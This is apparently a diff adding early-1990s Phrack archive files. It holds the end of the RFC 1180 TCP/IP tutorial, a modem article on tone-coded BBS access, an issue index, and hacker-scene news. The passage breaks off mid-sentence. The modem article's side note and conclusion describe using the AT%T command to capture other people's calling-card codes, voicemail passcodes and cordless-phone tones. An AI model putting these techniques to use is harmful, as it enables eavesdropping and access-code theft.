+              TABLE 13.  Delta's Route Table with Numbers
+
+   The match is found on the second entry.  IP then sends the IP packet
+   directly to epsilon through interface number 3.  The IP packet
+   contains the IP destination address of epsilon and the Ethernet
+   destination address of epsilon.
+
+   The IP packet arrives at epsilon and is passed up to epsilon's IP
+   module.  The destination IP address is examined and found to match
+   with epsilon's IP address, so the IP packet is passed to the upper
+   protocol layer.
+
+5.11  Routing Summary
+
+   When a IP packet travels through a large internet it may go through
+   many IP-routers before it reaches its destination.  The path it takes
+   is not determined by a central source but is a result of consulting
+   each of the routing tables used in the journey.  Each computer
+   defines only the next hop in the journey and relies on that computer
+   to send the IP packet on its way.
+
+5.12  Managing the Routes
+
+   Maintaining correct routing tables on all computers in a large
+   internet is a difficult task; network configuration is being modified
+   constantly by the network managers to meet changing needs.  Mistakes
+   in routing tables can block communication in ways that are
+   excruciatingly tedious to diagnose.
+
+   Keeping a simple network configuration goes a long way towards making
+   a reliable internet.  For instance, the most straightforward method
+   of assigning IP networks to Ethernet is to assign a single IP network
+   number to each Ethernet.
+
+   Help is also available from certain protocols and network
+   applications.  ICMP (Internet Control Message Protocol) can report
+   some routing problems.  For small networks the route table is filled
+   manually on each computer by the network administrator.  For larger
+   networks the network administrator automates this manual operation
+   with a routing protocol to distribute routes throughout a network.
+
+   When a computer is moved from one IP network to another, its IP
+   address must change.  When a computer is removed from an IP network
+   its old address becomes invalid.  These changes require frequent
+   updates to the "hosts" file.  This flat file can become difficult to
+   maintain for even medium-size networks.  The Domain Name System helps
+   solve these problems.
+
+6.  User Datagram Protocol
+
+   UDP is one of the two main protocols to reside on top of IP.  It
+   offers service to the user's network applications.  Example network
+   applications that use UDP are:  Network File System (NFS) and Simple
+   Network Management Protocol (SNMP).  The service is little more than
+   an interface to IP.
+
+   UDP is a connectionless datagram delivery service that does not
+   guarantee delivery.  UDP does not maintain an end-to-end connection
+   with the remote UDP module; it merely pushes the datagram out on the
+   net and accepts incoming datagrams off the net.
+
+   UDP adds two values to what is provided by IP.  One is the
+   multiplexing of information between applications based on port
+   number.  The other is a checksum to check the integrity of the data.
+
+6.1  Ports
+
+   How does a client on one computer reach the server on another?
+
+   The path of communication between an application and UDP is through
+   UDP ports.  These ports are numbered, beginning with zero.  An
+   application that is offering service (the server) waits for messages
+   to come in on a specific port dedicated to that service.  The server
+   waits patiently for any client to request service.
+
+   For instance, the SNMP server, called an SNMP agent, always waits on
+   port 161.  There can be only one SNMP agent per computer because
+   there is only one UDP port number 161.  This port number is well
+   known; it is a fixed number, an internet assigned number.  If an SNMP
+   client wants service, it sends its request to port number 161 of UDP
+   on the destination computer.
+
+   When an application sends data out through UDP it arrives at the far
+   end as a single unit.  For example, if an application does 5 writes
+   to the UDP port, the application at the far end will do 5 reads from
+   the UDP port.  Also, the size of each write matches the size of each
+   read.
+
+   UDP preserves the message boundary defined by the application.  It
+   never joins two application messages together, or divides a single
+   application message into parts.
+
+6.2  Checksum
+
+   An incoming IP packet with an IP header type field indicating "UDP"
+   is passed up to the UDP module by IP.  When the UDP module receives
+   the UDP datagram from IP it examines the UDP checksum.  If the
+   checksum is zero, it means that checksum was not calculated by the
+   sender and can be ignored.  Thus the sending computer's UDP module
+   may or may not generate checksums.  If Ethernet is the only network
+   between the 2 UDP modules communicating, then you may not need
+   checksumming.  However, it is recommended that checksum generation
+   always be enabled because at some point in the future a route table
+   change may send the data across less reliable media.
+
+   If the checksum is valid (or zero), the destination port number is
+   examined and if an application is bound to that port, an application
+   message is queued for the application to read.  Otherwise the UDP
+   datagram is discarded.  If the incoming UDP datagrams arrive faster
+   than the application can read them and if the queue fills to a
+   maximum value, UDP datagrams are discarded by UDP.  UDP will continue
+   to discard UDP datagrams until there is space in the queue.
+
+7.  Transmission Control Protocol
+
+   TCP provides a different service than UDP.  TCP offers a connection-
+   oriented byte stream, instead of a connectionless datagram delivery
+   service.  TCP guarantees delivery, whereas UDP does not.
+
+   TCP is used by network applications that require guaranteed delivery
+   and cannot be bothered with doing time-outs and retransmissions.  The
+   two most typical network applications that use TCP are File Transfer
+   Protocol (FTP) and the TELNET.  Other popular TCP network
+   applications include X-Window System, rcp (remote copy), and the r-
+   series commands.  TCP's greater capability is not without cost: it
+   requires more CPU and network bandwidth.  The internals of the TCP
+   module are much more complicated than those in a UDP module.
+
+   Similar to UDP, network applications connect to TCP ports.  Well-
+   defined port numbers are dedicated to specific applications.  For
+   instance, the TELNET server uses port number 23.  The TELNET client
+   can find the server simply by connecting to port 23 of TCP on the
+   specified computer.
+
+   When the application first starts using TCP, the TCP module on the
+   client's computer and the TCP module on the server's computer start
+   communicating with each other.  These two end-point TCP modules
+   contain state information that defines a virtual circuit.  This
+   virtual circuit consumes resources in both TCP end-points.  The
+   virtual circuit is full duplex; data can go in both directions
+   simultaneously.  The application writes data to the TCP port, the
+   data traverses the network and is read by the application at the far
+   end.
+
+   As with all sliding window protocols, the protocol has a window size.
+   The window size determines the amount of data that can be transmitted
+   before an acknowledgement is required.  For TCP, this amount is not a
+   number of TCP segments but a number of bytes.
+
+8.  Network Appliations
+
+   Why do both TCP and UDP exist, instead of just one or the other?
+
+   They supply different services.  Most applications are implemented to
+   use only one or the other.  You, the programmer, choose the protocol
+   that best meets your needs.  If you need a reliable stream delivery
+   service, TCP might be best.  If you need a datagram service, UDP
+   might be best.  If you need efficiency over long-haul circuits, TCP
+   might be best.  If you need efficiency over fast networks with short
+   latency, UDP might be best.  If your needs do not fall nicely into
+   these categories, then the "best" choice is unclear.  However,
+   applications can make up for deficiencies in the choice.  For
+   instance if you choose UDP and you need reliability, then the
+   application must provide reliability.  If you choose TCP and you need
+   a record oriented service, then the application must insert markers
+   in the byte stream to delimit records.
+
+   What network aplications are available?
+
+   There are far too many to list.  The number is growing continually.
+   Some of the applications have existed since the beginning of internet
+   technology: TELNET and FTP.  Others are relatively new: X-Windows and
+   SNMP.  The following is a brief description of the applications
+   mentioned in this tutorial.
+
+8.1  TELNET
+
+   TELNET provides a remote login capability on TCP.  The operation and
+   appearance is similar to keyboard dialing through a telephone switch.
+   On the command line the user types "telnet delta" and receives a
+   login prompt from the computer called "delta".
+
+   TELNET works well; it is an old application and has widespread
+   interoperability.  Implementations of TELNET usually work between
+   different operating systems.  For instance, a TELNET client may be on
+   VAX/VMS and the server on UNIX System V.
+
+8.2  FTP
+
+   File Transfer Protocol (FTP), as old as TELNET, also uses TCP and has
+   widespread interoperability.  The operation and appearance is as if
+   you TELNETed to the remote computer.  But instead of typing your
+   usual commands, you have to make do with a short list of commands for
+   directory listings and the like.  FTP commands allow you to copy
+   files between computers.
+
+8.3  rsh
+
+   Remote shell (rsh or remsh) is one of an entire family of remote UNIX
+   style commands.  The UNIX copy command, cp, becomes rcp.  The UNIX
+   "who is logged in" command, who, becomes rwho.  The list continues
+   and is referred to collectively to as the "r" series commands or the
+   "r*" (r star) commands.
+
+   The r* commands mainly work between UNIX systems and are designed for
+   interaction between trusted hosts.  Little consideration is given to
+   security, but they provide a convenient user environment.
+
+   To execute the "cc file.c" command on a remote computer called delta,
+   type "rsh delta cc file.c".  To copy the "file.c" file to delta, type
+   "rcp file.c delta:".  To login to delta, type "rlogin delta", and if
+   you administered the computers in a certain wa, you will not be
+   challenged with a password prompt.
+
+8.4  NFS
+
+   Network File System, first developed by Sun Microsystems Inc, uses
+   UDP and is excellent for mounting UNIX file systems on multiple
+   computers.  A diskless workstation can access its server's hard disk
+   as if the disk were local to the workstation.  A single disk copy of
+   a database on mainframe "alpha" can also be used by mainframe "beta"
+   if the database's file system is NFS mounted commands to
+   use the NFS mounted disk as if it were local disk.
+
+8.5  SNMP
+
+   Simple Network Management Protocol (SNMP) uses UDP and is designed
+   for use by central network management stations.  It is a well known
+   fact that if given enough data, a network manager can detect and
+   diagnose network problems.  The central station uses SNMP to collect
+   this data from other computers on the network.  SNMP defines the
+   format for the data; it is left to the central station or network
+   manager to interpret the data.
+
+8.6  X-Window
+
+   The X Window System uses the X Window protocol on TCP to draw windows
+   on a workstation's bitmap display.  X Window is much more than a
+   utility for drawing windows; it is entire philosophy for designing a
+   user interface.
+
+9.  Other Information
+
+   Much information about internet technology was not included in this
+   tutorial.  This section lists information that is considered the next
+   level of detail for the reader who wishes to learn more.
+
+     o administration commands: arp, route, and netstat
+     o ARP: permanent entry, publish entry, time-out entry, spoofing
+     o IP route table: host entry, default gateway, subnets
+     o IP: time-to-live counter, fragmentation, ICMP
+     o RIP, routing loops
+     o Domain Name System
+
+10.  References
+
+   [1] Comer, D., "Internetworking with TCP/IP Principles, Protocols,
+       and Architecture", Prentice Hall, Englewood Cliffs, New Jersey,
+       U.S.A., 1988.
+
+   [2] Feinler, E., et al, DDN Protocol Handbook, Volume 2 and 3, DDN
+       Network Information Center, SRI International, 333 Ravenswood
+       Avenue, Room EJ291, Menlow Park, California, U.S.A., 1985.
+
+   [3] Spider Systems, Ltd., "Packets and Protocols", Spider Systems
+       Ltd., Stanwell Street, Edinburgh, U.K. EH6 5NG, 1990.
+
+11.  Relation to other RFCs
+
+   This RFC is a tutorial and it does not UPDATE or OBSOLETE any other
+   RFC.
+
+12.  Security Considerations
+
+   There are security considerations within the TCP/IP protocol suite.
+   To some people these considerations are serious problems, to others
+   they are not; it depends on the user requirements.
+   This tutorial does not discuss these issues, but if you want to learn
+   more you should start with the topic of ARP-spoofing, then use the
+   "Security Considerations" section of RFC 1122 to lead you to more
+   information.
+
+13.  Authors' Addresses
+
+   Theodore John Socolofsky
+   EMail: TEDS@SPIDER.CO.UK
+
+   Claudia Jeanne Kale
+   EMail: CLAUDIAK@SPIDER.CO.UK
+
+   Note:  This info taken from RFC-1180.
+_______________________________________________________________________________
diff --git a/phrack34/9.txt b/phrack34/9.txt
new file mode 100644
index 0000000..a8dcf8d
--- /dev/null
+++ b/phrack34/9.txt
@@ -0,0 +1,197 @@
+                                ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-four, File #9 of 11
+
+              ._._._._._._._._._._._._._._._._._._._._._._._._.
+              !                                               !
+              !      Advanced Modem-Oriented BBS Security     !
+              !                                               !
+              !          By Laughing Gas and Dead Cow         !
+              !                                               !
+              !     Written Exclusively for PHRACK 8/22/91    !
+              !_._._._._._._._._._._._._._._._._._._._._._._._!
+
+
+* Introduction =-= Things you need to know *
+
+This is an introduction and guide to setting up your BBS and modem so that a
+caller must know a certain code and append it to his dialing string in order to
+access the BBS.  This lets you have yet another way (besides newuser passwords,
+etc) to lock out unwanted callers.
+
+You can also set a certain pattern for your board's numerical code based on the
+day or the month or something, and distribute this pattern instead of having to
+distribute the access code.
+You must have an intelligent modem to be able to run a board which requires the
+access method I'm going to be discussing in this file.  However you don't need
+an intelligent modem to be able to call the same board, but you do have to
+enter the code manually if you do not have an intelligent modem.  (So only
+certain people can run a board with this method of access control, but >almost<
+anyone can call one.)
+
+All modem commands in this manual will be hayes 'AT' style commands, and some
+may be available only to USRobotics Courier modems with v.42bis, or certain
+other intelligent modems.  If you can't get it to work with your modem, your
+modem may not be able to do it, but try looking in your modem manual, just in
+case.
+
+NOTE: The ONLY modem that this method has been tested with is a USRobotics
+Courier HST modem, (the new kind) with the v.42bis.  I tested it with my modem
+which is an older HST (14.4, but no v.42bis) and it did NOT accept the AT%T
+command (it returned "ERROR"). Check page 83 of your HST manual for more info,
+or type AT%$ for on-line help from the modem firmware. (about as helpful as the
+manual, and neither are very detailed.)
+
+Things to know:
+        ATDT1234567;    This command causes your modem to dial 1234567 and
+                       then return to command mode.
+        ATDT1234567@1;  This command causes your modem to dial 1234567, wait for
+                        an answer, dial 1 and return to command mode.
+|-----> AT%T            This command causes every tone that goes into the modem
+|                       to be identified and followed with a 0.
+|
+|---------------------- This is the key to the whole enchilada.
+
+Alternate commands may be available depending on your modem type.
+
+* Concept =-= How-To
+
+The concept for the bbs access code would be as follows.
+
+The caller dials the number to the BBS, when the BBS picks up, it sends a
+digit, then the caller sends a responding set of digits.  If the digits which
+the caller sends match the access code for the BBS, the BBS will send an answer
+tone and the caller's modem will acknowledge and connection.
+
+How it works is like this:
+ (Sample Transcript)
+
+CALLER> ATDT1234567@234
+   BBS> RING
+   BBS> ATDT1;
+   BBS> OK
+   BBS> AT%T
+   BBS> 203040
+   BBS> ATA
+
+What happens is the caller dials 1234567 (the number of the BBS) the '@' tells
+the callers modem to wait for a result (which is received when the BBS gets a
+ring and sends a 1) then the callers modem dials 234 (the access code) after
+
+the BBS sent the '1' it got a OK so it sent a AT%T which told it to monitor
+tones.  This command returned "203040" which is 234 followed by 0's (the format
+of the output of AT%T) the BBS software would have to watch for this string.
+Since 234 was the right code, the board sent an ATA which would connect the
+caller since it's dial command was still open.  If 234 hadn't been the code,
+then the BBS would have sent a ATH0.
+
+* Manual Dialing =-= Lame modems *
+
+Anyway, if you don't have a modem that does the AT%T or ATDT1; commands you
+CANNOT run a BBS with this type of security, unless your modem has EQUIVALENT
+commands, or you can figure out a way to do it with the commands your modem
+has.  The toughest part is the reading of tones, which, as far as I know, is
+unique to the HST/Courier modems.
+
+However, if your modem does not do the ATDT1@1 thing, then you can PROBABLY
+still call a board using this security.  This is assuming you can just send a
+"dial command" to your modem without a number (ie ATD on an HST.)  What you do
+is dial the BBS number manually, then you'll here a beep, you dial the code,
+then send the dial command to your modem and put the phone down.  This should
+connect you in the same fashion.. (ie..)
+
+CALLER> manually dials BBS
+   BBS> ATDT1;
+CALLER> hears beep and dials 234, then sends ATD to his modem and puts the
+        phone down.
+   BBS> OK
+   BBS> AT%T
+   BBS> 203040
+   BBS> ATA
+CALLER> his modem connects.
+
+* Bells and Whistles =-= Wrapping It Up *
+
+Your options when using this type of security.  There are many different things
+you can do.
+
+Method #1: You can say "Hey, the access code for my board is 234" and give
+that to the people you want to call.
+
+Method #2: Set a pattern for your access codes.  Say, the date (ie, for today,
+8-22-91 the code would be 082291), or you could get more complex (add one to
+each digit, run it through an algorithm, etc)
+
+Method #3: Distribute a program that generates the code based on the day, the
+month, what have you.  (However this is only a solution if you can either
+distribute a program like this to EVERY type of operating system, or you only
+want callers from one operating system (or several, the only ones you can
+produce it for..)
+
+Method #4: Have the BBS accept several codes, and give out  different code to
+each class of users (say, newusers to apply = 1234, validated = 2345, elite =
+3456) or something like that, this would allow for control of who calls when,
+as well as logging of call class frequency, etc.
+
+Method #5: Have a specific code for each user.  This would take a lot of
+maintenance, but would provide for a VERY secure BBS environment.  This would
+allow the same advantages above as well (logging, freq. etc).
+
+Things to keep in mind however are if you have an access code generated by a
+program or by the date, etc. you have to change the code whenever the program
+would.
+
+An interesting side note here is that the AT%T command can be used to call a
+COCOT (private payfone) and record the tones, or possibly to record codes other
+people entered, etc.  (Ie, bring your laptop with modem to a office, attach
+it to an extension and wait for a person to pick up, issue the ATD; command
+right away, then AT%T command.  If the person dials a 950, you should get
+something like
+
+        90500010003030 (pause) 203040506070
+
+that is assuming the code is 234567.  Congratulations, you now have their code.
+The modem can recognize the dtmf tones for 0-9, *, #, and the silver box tones
+A, B, C, and E.  I'm sure other interesting uses for this feature can be
+found, and I'd love to hear from the other people out there in the h/p world.
+  I'm sure a lot of you have seen me around, for those that haven't I can be
+reached on my board, Solsbury Hill or Ripco (312) or on Internet as
+lgas@doomsday.spies.com.
+
+(Note: Spies is down as of this writing, I have some other accounts, but I'd
+prefer that most of them remain unknown... if anyone wants to offer me an
+account I can use just for mail where I can have my alias for the account
+name, on a stable system, please contact me.)
+
+
+* Non-BBS Oriented Stuff =-= Conclusion *
+
+In some issue of 2600 magazine someplace at some time they published an article
+on how to build a tone detection device: Now you have your own, built in to the
+modem.
+
+An example application of this "in the field" would be calling a COCOT and
+using the modem to decipher the tones.  That would be done:
+
+ATDT3014283268;                      ;call the COCOT
+AT%T                                 ;get tones
+
+it should respond with the decoded tones.
+
+You could fool around with it and get it to accept input from a tape recorder,
+this gives you a way to decipher recorded VMB passcodes, or phone numbers, or
+anything else that was recorded as it was dialed. Or use it with a radio
+scanner set to scan the freqs that cordless fones operate on, and record those
+tones. Then play 'em back into the modem and they're yours.
+
+In conclusion... (ahem).. This is an area which I believe has never been
+breached before, and this idea was brought to you by THUGS.  As long as
+technology keeps advancing, we'll be here to bring you the latest tricks such
+as this one.  Please contact me if you have any information about this area
+(tone detection via modem, or anything relating to it at all..) especially if
+you know of modems besides the v.42bis models of USRobotic's HSTs that can do
+this.
+
+Laughing Gas
+Solsbury Hill BBS (301-428-3268)
+_______________________________________________________________________________
diff --git a/phrack35/1.txt b/phrack35/1.txt
new file mode 100644
index 0000000..a84c9ba
--- /dev/null
+++ b/phrack35/1.txt
@@ -0,0 +1,72 @@
+                               ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-five, File 1 of 13
+
+                               Issue XXXV Index
+                              __________________
+
+                               P H R A C K  3 5
+
+                               November 17,1991
+                              __________________
+
+                             ~Don't Tread on Me!~
+
+     Phrack Inc. is going great!  In fact so great that we already have enough
+material for the next two issues including the long-awaited sequel to Phrack 13
+(the infamous joke issue released on April 1, 1987), Diet Phrack!  That issue
+which will be number 36 is scheduled for release next month and will mark the
+end of Volume 3.  If you have anything that is somewhat humorous, send it over
+to us at Phrack as soon as possible so we can include it.
+
+     Phrack Inc. celebrates its sixth birthday with the release of this issue.
+Exactly six years ago, sitting in front of an IBM PC known as Metal Shop
+Private, were Taran King and Knight Lightning releasing a soon to be famous
+publication called Phrack Inc.  That first issue wasn't much, a small
+collection of eight files sent across the country to bulletin boards at 1200
+baud.  Six years is quite a long time in the hacker underground.  Today we send
+Phrack to thousands of people at hundreds of Internet sites spanning the entire
+world.  Phrack has become more than a magazine, it truly is an institution.
+Long Live Phrack!
+
+     Pay close attention to Phrack World News this issue for details on HoHo/
+XMAScon and many other stories with serious ramifications to our way of life.
+
+     Special thanks to Twisted Pair (for the help in a jam), Amadeus, The
+Butler, and Black Kat for the great files.  Thanks to the Great Gatsby, just
+because he is cool.  It's people like you that keeps this magazine comming out
+so frequently.
+
+     This month we have had a ton of letters for Phrack Loopback.  If your
+letter or question did not appear, we are sorry that it has to wait one more
+issue!  The last issue really got some administrators (or wanna-be admins)
+steamed at us.  Check out Phrack Loopback and PWN Quicknotes for details.
+
+Your Editors,
+
+                  Crimson Death and Dispater
+                   phrack@stormking.com
+
+
+Submissions: phrack@stormking.com
+FTP Distribution: cs.widener.edu or eff.org
+
+______________________________________________________________________________
+
+                         Phrack XXXV Table of Contents
+                         =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+ 1. Introduction to Phrack 34 by Crimson Death and Dispater
+ 2. Phrack Loopback by Phrack Staff
+ 3. Phrack Profile of Chris Goggans by S. Leonard Spitz
+ 4. Telenet/Sprintnet's PC Pursuit Outdial Directory by Amadeus
+ 5. Sting Operations by Sovereign Immunity
+ 6. Social Security Numbers & Privacy by Chris Hibbert of CPSR
+ 7. Users Guide to VAX/VMS Part 1 of 3 by Black Kat
+ 8. A Beginners Guide to Novell Netware 386 by The Butler
+ 9. Auto-Answer It by Twisted Pair
+10. PWN/Part 1 by Dispater
+11. PWN/Part 2 by Dispater
+12. PWN/Part 3 by Dispater
+13. PWN/Part 4 by Dispater
+______________________________________________________________________________
diff --git a/phrack35/10.txt b/phrack35/10.txt
new file mode 100644
index 0000000..2d32131
--- /dev/null
+++ b/phrack35/10.txt
@@ -0,0 +1,423 @@
+                                ==Phrack Inc.==
+
+                 Volume Three, Issue Thirty-five, File 10 of 13
+
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN            Issue XXXV / Part One            PWN
+              PWN                                             PWN
+              PWN            Compiled by Dispater             PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+Welcome to another edition of Phrack World News.  Read this issue very
+carefully because it is full of very important stories about a multitude of
+different issues.  Special thanks goes to Dark OverLord, Stainless Steel
+Provider, and Private Citizen for their help in preparing this issue.
+_______________________________________________________________________________
+
+XMASCON 1991
+~~~~~~~~~~~
+NIA Magazine & Phrack Inc. present:
+
+                           The Second Annual
+
+                             X M A S C O N
+
+
+Who:  All Hackers, Journalists, Security Personnel, Federal Agents, Lawyers,
+      Authors and Other Interested Parties.
+
+Where:                 Houston Airport Hilton Inn
+                          500 North Belt East
+                         Houston, Texas  77060
+                                 U.S.A.
+                          Tel: (713) 931-0101
+                          Fax: (713) 931-3523
+
+When:      Friday December 27 through Sunday December 29, 1991
+
+
+Yes, ladies and gentlemen, you read it right... Xmascon has returned! This will
+undoubtedly be the telecom event of the year. Unlike certain conferences in the
+past, Xmascon 91 has a devoted and dedicated staff who are putting in an
+unmentionable amount of time to ensure a large, vast and organized collection
+of some of the most diversified people in the telecommunications world. The
+event will be open to the public so that anyone may attend and learn more about
+the different aspects of computer security.
+
+
+                           Hotel Information
+                           -----------------
+
+The Houston Airport Hilton Inn is located about 6 miles from Intercontinental
+Airport. The Xmascon group room rates are $49.00 plus tax (15%) per night, your
+choice of either single or double. There are also 7 suites available, the
+prices of which vary from $140 to $250. You can call the hotel to find out the
+differences and availability of the suites, and you will also NEED to tell them
+you are with the Xmascon Conference to receive the reduced room rate,
+otherwise, you will be paying $69.00. There is no charge for children,
+regardless of age, when they occupy the same room as their parents.  Specially
+designed rooms for the handicapped are available. The hotel provides free
+transportation to and from the airport, as well as neighboring Greenspoint
+Mall, every 30 minutes on the hour, and on call, if needed. There are 2
+restaurants in the hotel. The Wicker Works is open until 11:00 pm, and The
+Forty Love is open 24 Hours. There will also be breakfast, lunch and dinner
+buffets each day. There is a piano bar, The Cycle Club, as well as a sports
+bar, Chaps, which features numerous table games, large screen TV, and a disco
+with a DJ.  Within the hotel compound, there are 3 pools, 2 of which are
+indoors, a jacuzzi, a miniature golf course, and a fully equipped health club
+which features universal weights, a whirlpool and sauna.  A car rental agency
+is located in the hotel lobby, and you can arrange to pick your car up at
+either the airport or the hotel. Xmascon attendees are entitled to a discounted
+rate. Contact the hotel for more information.
+
+Xmascon will last 3 days, with the main conference being held on Saturday,
+December 28, in the Osage meeting room, starting at 12:00 p.m. and continuing
+on throughout the evening. This year, we have our own complete wing of the
+hotel, which is housed around a 3,000 square foot atrium ballroom. The wing
+is completely separated from the rest of the hotel, so we are strongly
+encouraging people to make their reservations as far in advance as possible
+to ensure themselves a room within our area.
+
+We are hoping to have a number of people speak on a varied assortment of
+topics. If you would like to speak, please contact us as soon as possible and
+let us know who you are, who you represent (if anyone), the topic you wish to
+speak on, a rough estimate of how long you will need, and whether or not you
+will be needing any audio-visual aids.
+
+There will be a display case inside the meeting room which will hold items of
+telecom interest. Specific items that will be available, or that we hope to
+have, include the first issues of 2600, Tap, Mondo 2000, and other magazines,
+non-computer related magazines that feature articles of interest, a wide array
+of boxes, the Quaker Oats 2600 mhz whistle, The Metal AE, etc. We will also
+have a VCR and monitor set up, so if you have any interesting videos (such as
+the Unsolved Mysteries show featuring Kevin Poulsen), or if you have anything
+you think people would enjoy having the chance to see, please let us know ahead
+of time, and tell us if you will need any help getting it to the conference.
+If all else fails, just bring it to the con and give it to us when you arrive.
+
+If anyone requires any additional information, needs to ask any questions,
+wants to RSVP, or would like to be added to the mailing list to receive the
+Xmascon updates, you may write to either myself (Drunkfux), Judge Dredd, or
+Lord Macduff via Internet at:
+
+                          nia@nuchat.sccsi.com
+
+Or via US Mail at:
+
+                         Hard Data Corporation
+                               ATTN: HoHo
+                             P.O. Box 60695
+                         Airport Mail Facility
+                      Houston, Texas  77205-9998
+                                 U.S.A.
+
+We will hopefully have an 800 mailbox before the next update is sent out.  If
+someone cares to donate a decent one, that will stay up throughout the end of
+the year, please let us know. We should also be listing a few systems as an
+alternative form of reaching us.
+
+Xmascon 91 will be a priceless learning experience for professionals, and gives
+journalists a chance to gather information and ideas direct from the source. It
+is also one of the very few times when all the members of the computer
+underground can come together for a realistic purpose. We urge people not to
+miss out on an event of this caliber, which doesn't happen very often. If
+you've ever wanted to meet some of the most famous people from the hacking
+community, this may be your one and only chance. Don't wait to read about it in
+all the magazines, and then wish you had attended, make your plans to be there
+now! Be a part of our largest and greatest conference ever.
+
+Remember, to make your reservations, call (713) 931-0101 and tell them you're
+with Xmascon.
+
+In closing...  if you miss this one, you're only cheating yourself.
+_______________________________________________________________________________
+
+MindRape Revisited                                           September 27,1991
+~~~~~~~~~~~~~~~~~
+>From Arizona State University State Press
+Further Reading:  Phrack Issue 34, File 11, "MindRape or MediaRape?"
+
+     An Arizona State University (ASU) student is one of seven suspects in a
+computer fraud scheme that one US West Communications official said could cost
+the carrier and the phone company as much as $5 billion in one year.
+
+     Police in Phoenix, Arizona have seized computer equipment, software, and a
+list of long distance calling card codes from the home of the unidentified
+19-year-old student.
+
+     The student is one of seven people -- three in Oregon and one each in
+Washington, Utah, and Iowa -- singled out as suspects in a month-long
+investigation of electronic phone fraud conducted by Phoenix police, said Jim
+Waltman, a fraud manager for US West Communications.  The Phoenix man has not
+been arrested.
+
+    The computer "hackers" allegedly used their computers to gain access to
+secret long distance phone access codes such as the ones found on calling
+cards, and sold codes to other students for profit.
+
+    US West officials told the Associated Press that it is unknown how many
+local customers have been wrongfully billed for long distance calls on their
+accounts.
+
+    Kevin Robinson, public information sergeant for the Phoenix Police
+Department, would not comment on the investigation.
+
+    Art Carter, dean of Student Life at Arizona State University (ASU), said
+that if the student is charged, the case will be reviewed under the ASU Code of
+Conduct and the action taken by the University will be determined at that time.
+
+    Mark Knighton, security director for LDL Long Distance, said his company
+and US West were able to trace calls to several location, including the home of
+the Phoenix man.
+
+    The Phoenix man has not been arrested, authorities said.
+
+    Waltman said he was with Phoenix police a week ago when they searched the
+north Phoenix home and uncovered what turned out to be an inexpensive and
+relatively simple system for getting free codes.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Editor's Comment by: Dispater
+
+     What MindRape has been charged with cannot be determined now.  A request
+must be submitted to Arizona Public Records and be considered for release to
+the requestor.
+
+Here are some possibly useful numbers:
+
+Arizona Special Investigations Division (602)542-4853
+County Attorney's Office                (602)262-3411      (Gail Thackeray)
+Arizona Republic Newspaper              (602)271-8000
+Phoenix Police Department
+- General Investigations                (602)262-6141
+- Police Information                    (602)262-7626
+- Police Records                        (602)262-6134
+_______________________________________________________________________________
+
+East Coast LOD Hackers Create Virtual Reality MAELSTROM
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+         "It's reached the point where hacking is counter-productive."
+
+If the 1980's were the decade that hackers emerged from their relative
+obscurity as computer oddities, to be transformed in the public's perception as
+front-page news -- then the 90's are shaping up to be the decade of hacker
+turned entrepreneur.  Lately the notorious hacker group Legion of Doom seems to
+be a particularly fertile spawning ground for ex-hackers turned
+young-businessman.
+
+Two former East-Coast Legion of Doom members, Bruce Fanscher <Dead Lord> and
+Patrick Krupa <Lord Digital>, have pooled their talents to form a new company
+in the burgeoning field of Virtual Reality.
+
+The arena of Virtual Reality has often been called technology in search of a
+purpose and at times resembles nothing more than an interactive movie meets
+videogame.  This chaotic state of affairs has led to a never-never land of
+incompatible technologies and far-out ideas, that have tremendous potential,
+but little commercial application at present.  Fanscher and Krupa plan to
+change all that.  "VR isn't anything new, it's something we've been living for
+over half our lives.  The only difference is the state of current technology,
+makes possible an incredible variety of application." said Krupa in an
+interview.  "Right now we're in the ideal position to move forward on ideas
+we've been working on for years," added Fanscher.
+
+Krupa, who had attained the status of cult figure in the hacker underground
+prior to his arrest, as chronicled by John Markoff (New York Times) technology
+columnist, has spent the last several years working in the very lo-tech world
+of theater, "Basically I was totally burnt out on computers.  I mean I don't
+give a damn if my word processor boots in one second instead of eight, and
+that's the only place anything was heading for a long time.  The NeXT has
+changed all that and brought to market something truly innovative, although I
+still don't care too much about technology as anything but a medium through
+which you can reach people and affect their experiences and perceptions."
+
+No stranger to creative innovation himself, Fanscher, Krupa's longtime
+compatriot, has spent his share of time in the somewhat murky spotlight of the
+hacker underground.  Musing about his days as a hacker delving into computer
+systems to see how they worked, Fanscher remarked that:
+
+     "It's reached the point where hacking is counter-productive.  You can
+     only take apart things other people have designed and see what makes
+     them work, for so long, before it becomes an exercise in boredom and
+     the time comes to use what you've learned to create something new
+     that nobody has ever seen before.  My current interest in other
+     people's systems is zero.  It was a useful learning experience for me,
+     but there's no future in it."
+
+This oddly charismatic, dynamic duo is rounded out by Delia Kopold a former
+actress and theater major who is the architect of the worlds that make
+MAELSTROM come alive.  This initial offering by the collection of talents will
+be an online system run on the NeXTcube supermicro -- a machine that looks more
+like a piece of modern art than a computer -- that offers enhanced versions of
+all the usual amenities like electronic messaging, file transfers, and
+networking, all revolving around MAELSTROM, a program Fanscher calls, "a
+real-time virtual interaction simulation engine."  MAELSTROM will initially
+take the form of an extremely detailed fantasy world complete with custom
+graphic programs that run on MS-DOS, Macintosh and Amiga computers, allowing
+users to tap into the NeXTcube's system architecture through their home
+computers connected to telephone lines.  "Maelstrom isn't really a fantasy
+game, it's actually a universal engine comprised of objects that can be
+accessed by a variety of graphic, sound and data files to create just about any
+multi-user reality you can dream up," explains Krupa.
+
+The MAELSTROM system is about to go through a short beta-test run in New York
+City prior to a national ad campaign that will herald its universal
+accessibility on packet switch.  "Our beta system already offers everything
+that competing services offer, but at a much lower cost -- and we're still
+adding features.  And nothing like Maelstrom has ever existed before, the
+technology just wasn't there," concludes Fanscher.
+_______________________________________________________________________________
+
+2600 Magazine Exposes Security Holes                           October 18,1991
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by John F. McMullen & Barbara E. McMullen (Newbytes)
+
+Armonk, New York -- Supported by videotape examples, Emmanuel Goldstein, editor
